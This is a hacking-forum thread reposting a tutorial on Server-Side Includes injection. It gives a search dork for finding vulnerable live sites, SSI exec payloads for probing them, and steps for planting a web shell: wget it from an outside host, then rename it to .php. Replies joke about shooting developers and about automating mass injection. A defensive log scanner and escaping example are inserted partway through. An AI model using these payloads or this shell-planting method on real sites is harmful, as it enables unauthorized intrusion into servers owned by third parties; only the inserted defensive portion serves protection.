GreySec Forums

[SSI] Server-Side Includes Injection. [Tutorial]

Just reposting some good and notable threads from my previous (now dead) home forum, Hacksociety.

Credits: ๖ۣۜΗ α x O r ♥

Things you will need:
  1. A site vulnerable to SSI injection (I will be giving a few dorks and a few vulnerable sites to practice on)
  2. Common sense.

What is SSI?

SSI Injection (Server-side Include) is a server-side exploit technique that allows an attacker to send code into a web application, which will later be executed locally by the web server. SSI Injection exploits a web application's failure to sanitize user-supplied data before it is inserted into a server-side interpreted HTML file.

The Server-Side Includes attack allows the exploitation of a web application by injecting scripts into HTML pages or executing arbitrary code remotely. It can be exploited through manipulation of SSI in use in the application, or by forcing its use through user input fields.

If an attacker submits a Server-side Include statement, he may have the ability to execute arbitrary operating system commands, or include a restricted file's contents the next time the page is served.

Source: Wikipedia/etc.

Contents

Finding a vulnerable site

I will provide a few dorks for this type of injection.
The best dork I found is inurl:bin/Cklb/, but it gave about 863 results, so it's not that usable.

Let's get to work, shall we?

Enter inurl:bin/Cklb/ in Google and go testing...

Testing a site

So once you've used that dork and opened a site, you must determine if the site is vulnerable to this type of injection.

Here are some commands you can use:
Credits: Stewie™
Code:

<!--#echo var="DATE_LOCAL" -->
Will display the Date

<!--#exec cmd="whoami"-->
Will show which user is running on the server

<!--#exec cmd="ls -a" --> (Linux)
Will display all files in the directory

<!--#exec cmd="dir" --> (Windows)
Will display all files in the directory

Now take one of the commands and insert it in search boxes or login fields.
Mostly login fields are vulnerable, but there are some cases where search boxes are vulnerable.

NOTE: You must enter your command into both fields (if the login fields are vulnerable!!)

And when you insert any command:
Code:
<!--#exec cmd="ls -a" -->

[Image: regionyo.png]

[Image: regionoq.png]

Now we see that our command executed successfully and that our site is vulnerable.

Spawning a shell

So we have our vulnerable site and we are ready to upload a shell.
First of all you will need a .TXT of your favourite shell (host it somewhere: free hosting, a hacked site, or anything you've got).

Now we must download it to our site like this:
Code:
<!--#exec cmd="wget http://website.com/dir/shell.txt" -->

So insert your site where your shell is hosted in the command and you are ready to go.

Now just paste it into the fields and press Login or Enter.

[Image: regiontv.png]

To see if your .TXT file downloaded, execute the command we used before:
Code:
<!--#exec cmd="ls -a" -->

[Image: regionwt.png]

If you see that it downloaded successfully, now you must rename it from .txt to .php!
You can use this command:

Code:
<!--#exec cmd="mv shell.txt shell.php" -->

You can rename the file to whatever you need (of course, you will need to put your .TXT name first).

My command:

Code:
<!--#exec cmd="mv config1.txt config.php" -->

Now list the files again and try to find your file.
If you found it, just access it.

[Image: regionr.png]

That would be the end of this tutorial.
I hope you learned something, and do not rape sites with this
(be smart and use them).

Further reading: https://owasp.org/www-community/attacks/..._Injection
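Turning the directives above around to the defender's side, here is an added example that is not from the original post or any project: a Python scanner that URL-decodes request URIs from constructed Apache access-log lines, flags SSI directives (including the malformed "<!-- #exec" form), grades each by element, and shows the escaping that keeps user input from ever being parsed as a directive. The log format, sample lines, IP addresses and severity labels are assumptions.

```python
import html
import re
from urllib.parse import unquote_plus

# Apache mod_include syntax is "<!--#element attr=value ... -->"; the "\s*" after
# "<!--" also catches the malformed "<!-- #exec" variant that probes often use.
SSI_DIRECTIVE = re.compile(
    r"<!--\s*#\s*(?P<element>echo|exec|include|config|fsize|flastmod|printenv|set)"
    r"\b(?P<attrs>[^>]*?)-->", re.IGNORECASE)

# exec runs commands; include/fsize/flastmod read files; echo/printenv only leak
# variables, but a DATE_LOCAL probe confirms the page is server-parsed. (Assumed labels.)
SEVERITY = {"exec": "critical", "include": "high", "fsize": "high",
            "flastmod": "high", "echo": "medium", "printenv": "medium"}


def find_ssi_directives(text):
    """Return [(element, attrs, severity)] for every directive in (URL-encoded) text."""
    hits = []
    for m in SSI_DIRECTIVE.finditer(unquote_plus(text)):
        element = m.group("element").lower()
        hits.append((element, m.group("attrs").strip(), SEVERITY.get(element, "low")))
    return hits


def scan_access_log(lines):
    """Flag request URIs carrying an SSI directive. Access logs only show the URI;
    directives POSTed into login forms need body logging (e.g. a ModSecurity audit log)."""
    findings = []
    for line in lines:
        m = re.match(r'(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+)', line)
        if not m:
            continue
        for element, attrs, severity in find_ssi_directives(m.group(3)):
            findings.append({"src": m.group(1), "time": m.group(2), "element": element,
                             "attrs": attrs, "severity": severity})
    return findings


def sanitize_for_ssi_page(user_input):
    """Escape user text before it is written into a server-parsed (.shtml) page:
    html.escape turns "<" into "&lt;", so "<!--#exec ...-->" is no longer a directive."""
    return html.escape(user_input, quote=True)


# Constructed sample lines (not from the original post): an echo probe, a
# URL-encoded exec attempt, and a benign search.
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Mar/2020:03:05:00 +0000] "GET /search.shtml?q=%3C!--%23echo+var%3D%22DATE_LOCAL%22+--%3E HTTP/1.1" 200 512',
    '203.0.113.7 - - [27/Mar/2020:03:05:09 +0000] "GET /search.shtml?q=%3C!--%23exec+cmd%3D%22whoami%22--%3E HTTP/1.1" 200 530',
    '198.51.100.4 - - [27/Mar/2020:03:06:00 +0000] "GET /search.shtml?q=ssi+tutorial HTTP/1.1" 200 498',
]
```

Escaping fixes the application side; on Apache itself, setting Options IncludesNOEXEC instead of Includes disables the #exec element outright, so a directive that does slip through cannot run commands.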
God if there are sites out there that are still vulnerable to this... the developer should quite literally be taken out back and shot. They have no business being a developer.
(03-27-2020, 03:05 AM) MuddyBucket Wrote:
God if there are sites out there that are still vulnerable to this... the developer should quite literally be taken out back and shot. They have no business being a developer.

Old, but gold ;) You never know what kind of ancient vulnerabilities are still lurking in the deep. Plenty of applications are running ancient code... That makes me wonder how many sites out there are still open to attacks like RFI... haha.

But yes, those developers should be shot in this day and age. Haha.
I'm half tempted to make a fork of DorkNet that automatically launches SSI injections on all sites it will collect using the dork you provided in the OP. Make it rain shells with a bit of luck.
(03-27-2020, 04:29 PM) Vector Wrote:
I'm half tempted to make a fork of DorkNet that automatically launches SSI injections on all sites it will collect using the dork you provided in the OP. Make it rain shells with a bit of luck.

I'm not sure how up to date the dork is nowadays :D But I'm sure there are plenty more dorks out there.
https://www.exploit-db.com/google-hacking-database